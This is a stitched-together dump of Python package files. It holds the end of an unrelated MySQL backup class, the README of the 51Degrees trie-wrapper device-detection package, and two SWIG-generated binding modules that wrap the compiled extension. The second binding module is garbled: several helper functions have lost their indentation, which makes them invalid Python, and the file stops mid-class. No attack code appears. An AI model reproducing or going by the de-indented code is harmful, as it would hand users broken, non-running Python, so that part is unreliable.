        result = subprocess.Popen(cmd, shell=True, stdout=subprocess.PIPE, stderr=subprocess.STDOUT)
        content = result.stdout.read()
        # mysqldump writes warnings to stderr; treat any other output as an error.
        if content and not content.decode().startswith("Warning:"):
            subject = "{} - {} backup error, reason: {}".format(self.host, database, content.decode())
            logging.error(subject)

        use_time = int(time.time()) - start_time
        logging.info('{} - {} backup finished, use time: {}s'.format(self.host, database, float('%.2f' % use_time)))

    def backup_by_table(self):
        """Placeholder for per-table backups; not implemented yet."""
        pass

    def backup_all(self, **kwargs):
        """Back up every database on the server except the excluded ones.

        Args:
            **kwargs: exclude_db (list of str) - schema names to skip.

        Returns:
            None
        """
        exclude_db = kwargs.get('exclude_db', [])
        db_list = [db for db in self.select_database() if db not in exclude_db]
        logging.info('db_list: {}'.format(db_list))
        for db in db_list:
            self.backup_by_database(db)
        logging.info('{} backup all finished'.format(self.host))
|51degrees|
Device Detection Python API
51Degrees Mobile Detector is a server side mobile detection solution.
Changelog
====================
- Fixed a bug where an additional compile argument was causing compilation errors with clang.
- Updated the v3-trie-wrapper package to include the Lite Hash Trie data file.
- Updated Lite Pattern data file for November.
- Updated Lite Hash Trie data file for November.
General
========
Before you start matching user agents, you may wish to configure the solution to use a different database. You can easily generate a sample settings file by running the following command
$ 51degrees-mobile-detector settings > ~/51degrees-mobile-detector.settings.py
The core ``51degrees-mobile-detector`` is included as a dependency when installing either the ``51degrees-mobile-detector-v3-wrapper`` or ``51degrees-mobile-detector-v3-wrapper`` packages.
During install a directory which contains your data file will be created in ``~\51Degrees``.
Settings
=========
General Settings
----------------
- ``DETECTION_METHOD`` (defaults to 'v3-wrapper'). Sets the preferred mobile device detection method. Available options are v3-wrapper (requires 51degrees-mobile-detector-v3-wrapper package), v3-trie-wrapper
- ``PROPERTIES`` (defaults to ''). List of case-sensitive property names to be fetched on every device detection. Leave empty to fetch all available properties.
- ``LICENCE`` Your 51Degrees license key for enhanced device data. This is required if you want to set up the automatic 51degrees-mobile-detector-premium-pattern-wrapper package updates.
Trie Detector settings
-----------------------
- ``V3_TRIE_WRAPPER_DATABASE`` Location of the Hash Trie data file.
Pattern Detector settings
--------------------------
- ``V3_WRAPPER_DATABASE`` Location of the Pattern data file.
- ``CACHE_SIZE`` (defaults to 10000). Sets the size of the workset cache.
- ``POOL_SIZE`` (defaults to 20). Sets the size of the workset pool.
Usage Sharer Settings
----------------------
- ``USAGE_SHARER_ENABLED`` (defaults to True). Indicates if usage data should be shared with 51Degrees.com. We recommended leaving this value unchanged to ensure we're improving the performance and accuracy of the solution.
- Adavanced usage sharer settings are detailed in your settings file.
Automatic Updates
------------------
If you want to set up automatic updates, add your license key to your settings and add the following command to your cron
$ 51degrees-mobile-detector update-premium-pattern-wrapper
NOTE: Currently auto updates are only available with our Pattern API.
Usage
======
Core
-----
By executing the following a useful help page will be displayed explaining basic usage.
$ 51degrees-mobile-detector
To check everything is set up , try fetching a match with
$ 51degrees-mobile-detector match "Mozilla/5.0 (iPad; CPU OS 5_1 like Mac OS X) AppleWebKit/534.46 (KHTML, like Gecko) Mobile/9B176"
Examples
=========
Additional examples can be found on our GitHub_ repository.
User Support
============
If you have any issues please get in touch with our Support_ or open an issue on our GitHub_ repository.
.. |51degrees| image:: https://51degrees.com/DesktopModules/FiftyOne/Distributor/Logo.ashx?utm_source=github&utm_medium=repository&utm_content=readme_pattern&utm_campaign=python-open-source
:target: https://51degrees.com
.. _GitHub: https://github.com/51Degrees/Device-Detection/tree/master/python
.. _Support: support@51degrees.com
| 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/README.rst | README.rst |
from sys import version_info as _swig_python_version_info
# Machine-generated by SWIG: version-dependent bootstrap that imports the
# compiled extension module (_FiftyOneDegreesTrieV3). Do not hand-edit.
if _swig_python_version_info >= (2, 7, 0):
    # Python 2.7+/3.x: locate the extension next to this package via importlib.
    def swig_import_helper():
        import importlib
        pkg = __name__.rpartition('.')[0]
        mname = '.'.join((pkg, '_FiftyOneDegreesTrieV3')).lstrip('.')
        try:
            return importlib.import_module(mname)
        except ImportError:
            # Fall back to a top-level module outside the package.
            return importlib.import_module('_FiftyOneDegreesTrieV3')
    _FiftyOneDegreesTrieV3 = swig_import_helper()
    del swig_import_helper
elif _swig_python_version_info >= (2, 6, 0):
    # Python 2.6: use the (deprecated) imp module to find and load the extension.
    def swig_import_helper():
        from os.path import dirname
        import imp
        fp = None
        try:
            fp, pathname, description = imp.find_module('_FiftyOneDegreesTrieV3', [dirname(__file__)])
        except ImportError:
            import _FiftyOneDegreesTrieV3
            return _FiftyOneDegreesTrieV3
        try:
            _mod = imp.load_module('_FiftyOneDegreesTrieV3', fp, pathname, description)
        finally:
            # Always close the file handle opened by find_module.
            if fp is not None:
                fp.close()
        return _mod
    _FiftyOneDegreesTrieV3 = swig_import_helper()
    del swig_import_helper
else:
    # Very old Pythons: plain import.
    import _FiftyOneDegreesTrieV3
del _swig_python_version_info
# Machine-generated by SWIG: Python 2/3 compatibility shims and the attribute
# dispatch helpers used by every proxy class below. Do not hand-edit.
try:
    _swig_property = property
except NameError:
    pass  # Python < 2.2 doesn't have 'property'.

try:
    import builtins as __builtin__  # Python 3
except ImportError:
    import __builtin__  # Python 2


def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
    # Route attribute writes through the SWIG-generated setter table so
    # wrapped C++ members are updated; optionally forbid new attributes.
    if (name == "thisown"):
        return self.this.own(value)
    if (name == "this"):
        if type(value).__name__ == 'SwigPyObject':
            self.__dict__[name] = value
            return
    method = class_type.__swig_setmethods__.get(name, None)
    if method:
        return method(self, value)
    if (not static):
        if _newclass:
            object.__setattr__(self, name, value)
        else:
            self.__dict__[name] = value
    else:
        raise AttributeError("You cannot add attributes to %s" % self)


def _swig_setattr(self, class_type, name, value):
    # Non-static variant: new attributes are allowed.
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)


def _swig_getattr(self, class_type, name):
    # Route attribute reads through the SWIG-generated getter table.
    if (name == "thisown"):
        return self.this.own()
    method = class_type.__swig_getmethods__.get(name, None)
    if method:
        return method(self)
    raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))


def _swig_repr(self):
    # Repr that survives a missing/invalid underlying C++ pointer.
    try:
        strthis = "proxy of " + self.this.__repr__()
    except __builtin__.Exception:
        strthis = ""
    return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)


try:
    _object = object
    _newclass = 1
except __builtin__.Exception:
    # Classic-class fallback for ancient Pythons.
    class _object:
        pass
    _newclass = 0
# Machine-generated by SWIG: abstract Python proxy for the C++ iterator used
# by the wrapped STL containers below. Do not hand-edit; changes are lost
# when the bindings are regenerated.
class SwigPyIterator(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)

    def __init__(self, *args, **kwargs):
        raise AttributeError("No constructor defined - class is abstract")
    __repr__ = _swig_repr
    __swig_destroy__ = _FiftyOneDegreesTrieV3.delete_SwigPyIterator
    __del__ = lambda self: None

    def value(self):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_value(self)

    def incr(self, n=1):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_incr(self, n)

    def decr(self, n=1):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_decr(self, n)

    def distance(self, x):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_distance(self, x)

    def equal(self, x):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_equal(self, x)

    def copy(self):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_copy(self)

    def next(self):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_next(self)

    def __next__(self):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___next__(self)

    def previous(self):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_previous(self)

    def advance(self, n):
        return _FiftyOneDegreesTrieV3.SwigPyIterator_advance(self, n)

    def __eq__(self, x):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___eq__(self, x)

    def __ne__(self, x):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___ne__(self, x)

    def __iadd__(self, n):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___iadd__(self, n)

    def __isub__(self, n):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___isub__(self, n)

    def __add__(self, n):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___add__(self, n)

    def __sub__(self, *args):
        return _FiftyOneDegreesTrieV3.SwigPyIterator___sub__(self, *args)

    def __iter__(self):
        return self

# Register the proxy class with the SWIG runtime.
SwigPyIterator_swigregister = _FiftyOneDegreesTrieV3.SwigPyIterator_swigregister
SwigPyIterator_swigregister(SwigPyIterator)
# Machine-generated by SWIG: dict-like Python proxy for
# std::map<std::string, std::string>. Do not hand-edit; changes are lost
# when the bindings are regenerated.
class MapStringString(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
    __repr__ = _swig_repr

    def iterator(self):
        return _FiftyOneDegreesTrieV3.MapStringString_iterator(self)

    def __iter__(self):
        return self.iterator()

    def __nonzero__(self):
        return _FiftyOneDegreesTrieV3.MapStringString___nonzero__(self)

    def __bool__(self):
        return _FiftyOneDegreesTrieV3.MapStringString___bool__(self)

    def __len__(self):
        return _FiftyOneDegreesTrieV3.MapStringString___len__(self)

    # NOTE: SWIG emits a second __iter__ that overrides the one above, so
    # iteration is over keys (dict-like behaviour).
    def __iter__(self):
        return self.key_iterator()

    def iterkeys(self):
        return self.key_iterator()

    def itervalues(self):
        return self.value_iterator()

    def iteritems(self):
        return self.iterator()

    def __getitem__(self, key):
        return _FiftyOneDegreesTrieV3.MapStringString___getitem__(self, key)

    def __delitem__(self, key):
        return _FiftyOneDegreesTrieV3.MapStringString___delitem__(self, key)

    def has_key(self, key):
        return _FiftyOneDegreesTrieV3.MapStringString_has_key(self, key)

    def keys(self):
        return _FiftyOneDegreesTrieV3.MapStringString_keys(self)

    def values(self):
        return _FiftyOneDegreesTrieV3.MapStringString_values(self)

    def items(self):
        return _FiftyOneDegreesTrieV3.MapStringString_items(self)

    def __contains__(self, key):
        return _FiftyOneDegreesTrieV3.MapStringString___contains__(self, key)

    def key_iterator(self):
        return _FiftyOneDegreesTrieV3.MapStringString_key_iterator(self)

    def value_iterator(self):
        return _FiftyOneDegreesTrieV3.MapStringString_value_iterator(self)

    def __setitem__(self, *args):
        return _FiftyOneDegreesTrieV3.MapStringString___setitem__(self, *args)

    def asdict(self):
        return _FiftyOneDegreesTrieV3.MapStringString_asdict(self)

    def __init__(self, *args):
        this = _FiftyOneDegreesTrieV3.new_MapStringString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this

    def empty(self):
        return _FiftyOneDegreesTrieV3.MapStringString_empty(self)

    def size(self):
        return _FiftyOneDegreesTrieV3.MapStringString_size(self)

    def swap(self, v):
        return _FiftyOneDegreesTrieV3.MapStringString_swap(self, v)

    def begin(self):
        return _FiftyOneDegreesTrieV3.MapStringString_begin(self)

    def end(self):
        return _FiftyOneDegreesTrieV3.MapStringString_end(self)

    def rbegin(self):
        return _FiftyOneDegreesTrieV3.MapStringString_rbegin(self)

    def rend(self):
        return _FiftyOneDegreesTrieV3.MapStringString_rend(self)

    def clear(self):
        return _FiftyOneDegreesTrieV3.MapStringString_clear(self)

    def get_allocator(self):
        return _FiftyOneDegreesTrieV3.MapStringString_get_allocator(self)

    def count(self, x):
        return _FiftyOneDegreesTrieV3.MapStringString_count(self, x)

    def erase(self, *args):
        return _FiftyOneDegreesTrieV3.MapStringString_erase(self, *args)

    def find(self, x):
        return _FiftyOneDegreesTrieV3.MapStringString_find(self, x)

    def lower_bound(self, x):
        return _FiftyOneDegreesTrieV3.MapStringString_lower_bound(self, x)

    def upper_bound(self, x):
        return _FiftyOneDegreesTrieV3.MapStringString_upper_bound(self, x)
    __swig_destroy__ = _FiftyOneDegreesTrieV3.delete_MapStringString
    __del__ = lambda self: None

# Register the proxy class with the SWIG runtime.
MapStringString_swigregister = _FiftyOneDegreesTrieV3.MapStringString_swigregister
MapStringString_swigregister(MapStringString)
# Machine-generated by SWIG: list-like Python proxy for
# std::vector<std::string>. Do not hand-edit; changes are lost when the
# bindings are regenerated.
class VectorString(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
    __repr__ = _swig_repr

    def iterator(self):
        return _FiftyOneDegreesTrieV3.VectorString_iterator(self)

    def __iter__(self):
        return self.iterator()

    def __nonzero__(self):
        return _FiftyOneDegreesTrieV3.VectorString___nonzero__(self)

    def __bool__(self):
        return _FiftyOneDegreesTrieV3.VectorString___bool__(self)

    def __len__(self):
        return _FiftyOneDegreesTrieV3.VectorString___len__(self)

    def __getslice__(self, i, j):
        return _FiftyOneDegreesTrieV3.VectorString___getslice__(self, i, j)

    def __setslice__(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString___setslice__(self, *args)

    def __delslice__(self, i, j):
        return _FiftyOneDegreesTrieV3.VectorString___delslice__(self, i, j)

    def __delitem__(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString___delitem__(self, *args)

    def __getitem__(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString___getitem__(self, *args)

    def __setitem__(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString___setitem__(self, *args)

    def pop(self):
        return _FiftyOneDegreesTrieV3.VectorString_pop(self)

    def append(self, x):
        return _FiftyOneDegreesTrieV3.VectorString_append(self, x)

    def empty(self):
        return _FiftyOneDegreesTrieV3.VectorString_empty(self)

    def size(self):
        return _FiftyOneDegreesTrieV3.VectorString_size(self)

    def swap(self, v):
        return _FiftyOneDegreesTrieV3.VectorString_swap(self, v)

    def begin(self):
        return _FiftyOneDegreesTrieV3.VectorString_begin(self)

    def end(self):
        return _FiftyOneDegreesTrieV3.VectorString_end(self)

    def rbegin(self):
        return _FiftyOneDegreesTrieV3.VectorString_rbegin(self)

    def rend(self):
        return _FiftyOneDegreesTrieV3.VectorString_rend(self)

    def clear(self):
        return _FiftyOneDegreesTrieV3.VectorString_clear(self)

    def get_allocator(self):
        return _FiftyOneDegreesTrieV3.VectorString_get_allocator(self)

    def pop_back(self):
        return _FiftyOneDegreesTrieV3.VectorString_pop_back(self)

    def erase(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString_erase(self, *args)

    def __init__(self, *args):
        this = _FiftyOneDegreesTrieV3.new_VectorString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this

    def push_back(self, x):
        return _FiftyOneDegreesTrieV3.VectorString_push_back(self, x)

    def front(self):
        return _FiftyOneDegreesTrieV3.VectorString_front(self)

    def back(self):
        return _FiftyOneDegreesTrieV3.VectorString_back(self)

    def assign(self, n, x):
        return _FiftyOneDegreesTrieV3.VectorString_assign(self, n, x)

    def resize(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString_resize(self, *args)

    def insert(self, *args):
        return _FiftyOneDegreesTrieV3.VectorString_insert(self, *args)

    def reserve(self, n):
        return _FiftyOneDegreesTrieV3.VectorString_reserve(self, n)

    def capacity(self):
        return _FiftyOneDegreesTrieV3.VectorString_capacity(self)
    __swig_destroy__ = _FiftyOneDegreesTrieV3.delete_VectorString
    __del__ = lambda self: None

# Register the proxy class with the SWIG runtime.
VectorString_swigregister = _FiftyOneDegreesTrieV3.VectorString_swigregister
VectorString_swigregister(VectorString)
# Machine-generated by SWIG: Python proxy for a device-detection match
# result. Instances are produced by Provider.getMatch and cannot be
# constructed directly. Do not hand-edit.
class Match(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Match, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Match, name)

    def __init__(self, *args, **kwargs):
        raise AttributeError("No constructor defined")
    __repr__ = _swig_repr
    __swig_destroy__ = _FiftyOneDegreesTrieV3.delete_Match
    __del__ = lambda self: None

    def getValues(self, *args):
        return _FiftyOneDegreesTrieV3.Match_getValues(self, *args)

    def getValue(self, *args):
        return _FiftyOneDegreesTrieV3.Match_getValue(self, *args)

    def getDeviceId(self):
        return _FiftyOneDegreesTrieV3.Match_getDeviceId(self)

    def getRank(self):
        return _FiftyOneDegreesTrieV3.Match_getRank(self)

    def getDifference(self):
        return _FiftyOneDegreesTrieV3.Match_getDifference(self)

    def getMethod(self):
        return _FiftyOneDegreesTrieV3.Match_getMethod(self)

    def getUserAgent(self):
        return _FiftyOneDegreesTrieV3.Match_getUserAgent(self)

# Register the proxy class with the SWIG runtime.
Match_swigregister = _FiftyOneDegreesTrieV3.Match_swigregister
Match_swigregister(Match)
# Machine-generated by SWIG: Python proxy for the device-detection provider
# that owns the data set and produces Match objects. Do not hand-edit.
class Provider(_object):
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, Provider, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, Provider, name)
    __repr__ = _swig_repr
    __swig_destroy__ = _FiftyOneDegreesTrieV3.delete_Provider
    __del__ = lambda self: None

    def getHttpHeaders(self):
        return _FiftyOneDegreesTrieV3.Provider_getHttpHeaders(self)

    def getAvailableProperties(self):
        return _FiftyOneDegreesTrieV3.Provider_getAvailableProperties(self)

    def getDataSetName(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetName(self)

    def getDataSetFormat(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetFormat(self)

    def getDataSetPublishedDate(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetPublishedDate(self)

    def getDataSetNextUpdateDate(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetNextUpdateDate(self)

    def getDataSetSignatureCount(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetSignatureCount(self)

    def getDataSetDeviceCombinations(self):
        return _FiftyOneDegreesTrieV3.Provider_getDataSetDeviceCombinations(self)

    def getMatch(self, *args):
        return _FiftyOneDegreesTrieV3.Provider_getMatch(self, *args)

    def getMatchWithTolerances(self, *args):
        return _FiftyOneDegreesTrieV3.Provider_getMatchWithTolerances(self, *args)

    def getMatchJson(self, *args):
        return _FiftyOneDegreesTrieV3.Provider_getMatchJson(self, *args)

    def setDrift(self, drift):
        return _FiftyOneDegreesTrieV3.Provider_setDrift(self, drift)

    def setDifference(self, difference):
        return _FiftyOneDegreesTrieV3.Provider_setDifference(self, difference)

    def reloadFromFile(self):
        return _FiftyOneDegreesTrieV3.Provider_reloadFromFile(self)

    def reloadFromMemory(self, source, size):
        return _FiftyOneDegreesTrieV3.Provider_reloadFromMemory(self, source, size)

    def getIsThreadSafe(self):
        return _FiftyOneDegreesTrieV3.Provider_getIsThreadSafe(self)

    def __init__(self, *args):
        this = _FiftyOneDegreesTrieV3.new_Provider(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this

# Register the proxy class with the SWIG runtime.
Provider_swigregister = _FiftyOneDegreesTrieV3.Provider_swigregister
Provider_swigregister(Provider)
# This file is compatible with both classic and new-style classes. | 51degrees-mobile-detector-v3-trie-wrapper | /51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4.tar.gz/51degrees-mobile-detector-v3-trie-wrapper-3.2.18.4/src/trie/FiftyOneDegreesTrieV3.py | FiftyOneDegreesTrieV3.py |
from sys import version_info as _swig_python_version_info
# SWIG-generated guard: the import helper below relies on importlib, so
# refuse to load on interpreters older than Python 2.7.
if _swig_python_version_info < (2, 7, 0):
    raise RuntimeError('Python 2.7 or later required')
def swig_import_helper():
    # Locate and import the compiled SWIG extension.  First try a
    # package-relative import (when this module is installed inside a
    # package); fall back to a top-level import for flat installs.
    import importlib
    pkg = __name__.rpartition('.')[0]
    mname = '.'.join((pkg, '_fiftyone_degrees_mobile_detector_v3_trie_wrapper')).lstrip('.')
    try:
        return importlib.import_module(mname)
    except ImportError:
        return importlib.import_module('_fiftyone_degrees_mobile_detector_v3_trie_wrapper')
# Bind the compiled extension once, then delete the helper and the version
# tuple so they do not leak into the module namespace.
_fiftyone_degrees_mobile_detector_v3_trie_wrapper = swig_import_helper()
del swig_import_helper
del _swig_python_version_info
# Python 3 renamed __builtin__ to builtins; alias it for 2/3 compatibility.
try:
    import builtins as __builtin__
except ImportError:
    import __builtin__
def _swig_setattr_nondynamic(self, class_type, name, value, static=1):
if name == "thisown":
return self.this.own(value)
if name == "this":
if type(value).__name__ == 'SwigPyObject':
self.__dict__[name] = value
return
method = class_type.__swig_setmethods__.get(name, None)
if method:
return method(self, value)
if not static:
if _newclass:
object.__setattr__(self, name, value)
else:
self.__dict__[name] = value
else:
raise AttributeError("You cannot add attributes to %s" % self)
def _swig_setattr(self, class_type, name, value):
    # Non-static variant: unknown names are stored on the instance
    # instead of raising AttributeError.
    return _swig_setattr_nondynamic(self, class_type, name, value, 0)
def _swig_getattr(self, class_type, name):
if name == "thisown":
return self.this.own()
method = class_type.__swig_getmethods__.get(name, None)
if method:
return method(self)
raise AttributeError("'%s' object has no attribute '%s'" % (class_type.__name__, name))
def _swig_repr(self):
try:
strthis = "proxy of " + self.this.__repr__()
except __builtin__.Exception:
strthis = ""
return "<%s.%s; %s >" % (self.__class__.__module__, self.__class__.__name__, strthis,)
# SWIG compatibility shim: use new-style classes when the `object` builtin
# exists (always true on modern Pythons); _newclass records which mode the
# attribute helpers above should use.
try:
    _object = object
    _newclass = 1
except __builtin__.Exception:
    class _object:
        pass
    _newclass = 0
class SwigPyIterator(_object):
    """SWIG proxy for the C++ iterator used by the STL container wrappers.

    Abstract: instances come from the containers' iterator() methods and
    every operation delegates to the compiled extension module.
    """
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, SwigPyIterator, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, SwigPyIterator, name)
    def __init__(self, *args, **kwargs):
        raise AttributeError("No constructor defined - class is abstract")
    __repr__ = _swig_repr
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_SwigPyIterator
    def __del__(self):
        return None
    def value(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_value(self)
    def incr(self, n=1):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_incr(self, n)
    def decr(self, n=1):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_decr(self, n)
    def distance(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_distance(self, x)
    def equal(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_equal(self, x)
    def copy(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_copy(self)
    # next/__next__ provided for both Python 2 and Python 3 iteration.
    def next(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_next(self)
    def __next__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___next__(self)
    def previous(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_previous(self)
    def advance(self, n):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_advance(self, n)
    def __eq__(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___eq__(self, x)
    def __ne__(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___ne__(self, x)
    def __iadd__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___iadd__(self, n)
    def __isub__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___isub__(self, n)
    def __add__(self, n):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___add__(self, n)
    def __sub__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator___sub__(self, *args)
    def __iter__(self):
        return self
# Register SwigPyIterator in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.SwigPyIterator_swigregister(SwigPyIterator)
class MapStringString(_object):
    """SWIG proxy for a C++ std::map<std::string, std::string>, exposing a
    Python dict-like interface.  All operations delegate to the compiled
    extension module."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, MapStringString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, MapStringString, name)
    __repr__ = _swig_repr
    def iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_iterator(self)
    def __iter__(self):
        return self.iterator()
    def __nonzero__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___nonzero__(self)
    def __bool__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___bool__(self)
    def __len__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___len__(self)
    # NOTE(review): __iter__ is emitted twice by the generator; this later
    # definition (key iteration, dict-like) is the one in effect.
    def __iter__(self):
        return self.key_iterator()
    def iterkeys(self):
        return self.key_iterator()
    def itervalues(self):
        return self.value_iterator()
    def iteritems(self):
        return self.iterator()
    def __getitem__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___getitem__(self, key)
    def __delitem__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___delitem__(self, key)
    def has_key(self, key):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_has_key(self, key)
    def keys(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_keys(self)
    def values(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_values(self)
    def items(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_items(self)
    def __contains__(self, key):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___contains__(self, key)
    def key_iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_key_iterator(self)
    def value_iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_value_iterator(self)
    def __setitem__(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString___setitem__(self, *args)
    def asdict(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_asdict(self)
    def __init__(self, *args):
        # Attach the new C object to this proxy; on old SWIG layouts
        # self.this is a list-like that is appended to instead.
        this = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.new_MapStringString(*args)
        try:
            self.this.append(this)
        except __builtin__.Exception:
            self.this = this
    # STL-style member functions mirrored from std::map.
    def empty(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_empty(self)
    def size(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_size(self)
    def swap(self, v):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_swap(self, v)
    def begin(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_begin(self)
    def end(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_end(self)
    def rbegin(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_rbegin(self)
    def rend(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_rend(self)
    def clear(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_clear(self)
    def get_allocator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_get_allocator(self)
    def count(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_count(self, x)
    def erase(self, *args):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_erase(self, *args)
    def find(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_find(self, x)
    def lower_bound(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_lower_bound(self, x)
    def upper_bound(self, x):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_upper_bound(self, x)
    __swig_destroy__ = _fiftyone_degrees_mobile_detector_v3_trie_wrapper.delete_MapStringString
    def __del__(self):
        return None
# Register MapStringString in _fiftyone_degrees_mobile_detector_v3_trie_wrapper:
_fiftyone_degrees_mobile_detector_v3_trie_wrapper.MapStringString_swigregister(MapStringString)
class VectorString(_object):
    """SWIG proxy for a C++ std::vector<std::string>, exposing a Python
    list-like interface.  All operations delegate to the compiled
    extension module."""
    __swig_setmethods__ = {}
    __setattr__ = lambda self, name, value: _swig_setattr(self, VectorString, name, value)
    __swig_getmethods__ = {}
    __getattr__ = lambda self, name: _swig_getattr(self, VectorString, name)
    __repr__ = _swig_repr
    def iterator(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString_iterator(self)
    def __iter__(self):
        return self.iterator()
    def __nonzero__(self):
        return _fiftyone_degrees_mobile_detector_v3_trie_wrapper.VectorString___nonzero__(self)
    def __bool__(self):
